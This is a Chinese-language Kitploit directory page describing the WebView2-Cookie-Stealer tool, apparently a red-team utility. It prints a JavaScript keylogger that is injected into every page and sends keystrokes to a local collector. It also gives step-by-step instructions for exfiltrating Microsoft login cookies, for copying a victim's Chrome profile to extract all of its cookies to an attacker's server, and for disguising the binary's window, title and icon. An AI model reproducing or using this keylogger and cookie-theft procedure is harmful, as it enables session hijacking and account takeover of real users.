Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WebView2-Cookie-Stealer — 将JavaScript键盘记录器注入WebView2页面,以捕获按键并通过HTTP GET请求从Microsoft身份验证会话中窃取Cookie。 | Kitploit
工具/GitHubGitHub/mrd0x/webview2-cookie-stealer
密码攻击Web应用程序漏洞利用数据泄露信息收集钓鱼攻击
GitHubmrd0x/webview2-cookie-stealer

WebView2-Cookie-Stealer

将JavaScript键盘记录器注入WebView2页面,以捕获按键并通过HTTP GET请求从Microsoft身份验证会话中窃取Cookie。

查看仓库
266584年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

博客文章

请阅读 这篇博客文章 获取更多信息。

源代码

此代码是 Microsoft 的 WebView2 代码 的修改版本。当前代码可以进行清理和大幅改进。

演示

启动示例

使用示例

使用方法

已在 Windows 10 和 11 上测试。

当二进制文件被执行时,会加载 https://office.com/login。一个 JavaScript 键盘记录器会被注入到每个页面中,并将按键记录发送到 http://127.0.0.1:8080。此外,当用户成功认证后,针对 login.microsoftonline.com 的 cookie 会被进行 base64 编码,并通过 HTTP GET 请求发送到 http://127.0.0.1:8080。

修改 JavaScript

如果你想要修改 JavaScript,需要在 AppWindow.cpp 中的 第 1096 行 处更改如下所示的代码。

root@kitploit:~
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

窃取 Chrome Cookie

WebView2 允许你使用现有的用户数据文件夹(UDF)启动,而不是创建一个新的。UDF 包含所有密码、会话、书签等。Chrome 的 UDF 位于 C:\Users\<username>\AppData\Local\Google\Chrome\User Data。我们可以简单告诉 WebView2 使用这个配置文件启动实例,并在启动后提取所有 cookie 并将它们传输到攻击者的服务器。

唯一的小问题是 WebView2 寻找一个名为 EBWebView 的文件夹,而不是 User Data(不知道为什么)。复制 User Data 文件夹并将其重命名为 EBWebView。

需要修改的地方

  • 在 app.cpp 中的 第 41 行:

    • 将 std::wstring userDataFolder(L""); 更改为 std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    • 指定的文件夹必须包含 EBWebView 文件夹,WebView2 将从中读取。
  • 在 ScenarioCookieManagement.cpp 中的 第 40 行:

    • 将 GetCookiesHelper(L"https://login.microsoftonline.com"); 更改为 GetCookiesHelper(L"");

当不带任何网站调用 GetCookiesHelper 时,它将提取所有 cookie。

注意:如果 cookie 数量很大,当前应用程序将无法正常工作,因为应用程序使用 GET 请求发送它们,而 GET 请求有长度限制。

重要函数

如果你想对二进制文件进行修改,可以在下面找到有关重要函数的信息。

  • AppStartPage.cpp - GetUri() 函数包含二进制执行时加载的 URL。
  • ScenarioCookieManagement.cpp - SendCookies() 函数包含发送 cookie 的 IP 地址和端口。
  • AppWindow.cpp - CallCookieFunction() 函数等待 URL 以 https://www.office.com/?auth= 开头,然后调用 ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
  • WebView2APISample.rc - 外观修改
    • 通过将所有 POPUP 值设置为 "" 来移除菜单栏。
    • 更改 IDS_APP_TITLE 和 IDC_WEBVIEW2APISAMPLE。这是标题栏中应用程序的名称。
    • 更改 IDI_WEBVIEW2APISAMPLE、IDI_WEBVIEW2APISAMPLE_INPRIVATE 和 IDI_SMALL。这些指向一个 .ico 文件,即该应用程序的图标。
下载工具
  • Toolbar.cpp - itemHeight 必须设置为 0 以移除顶部菜单。此代码中已经处理好了。
  • AppWindow.cpp - 应注释掉 LoadImage()。这会隐藏蓝色启动图片。此代码中已经处理好了。
  • App.cpp - 将 new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); 的最后一个参数值改为 true。这会隐藏工具栏。此代码中已经处理好了。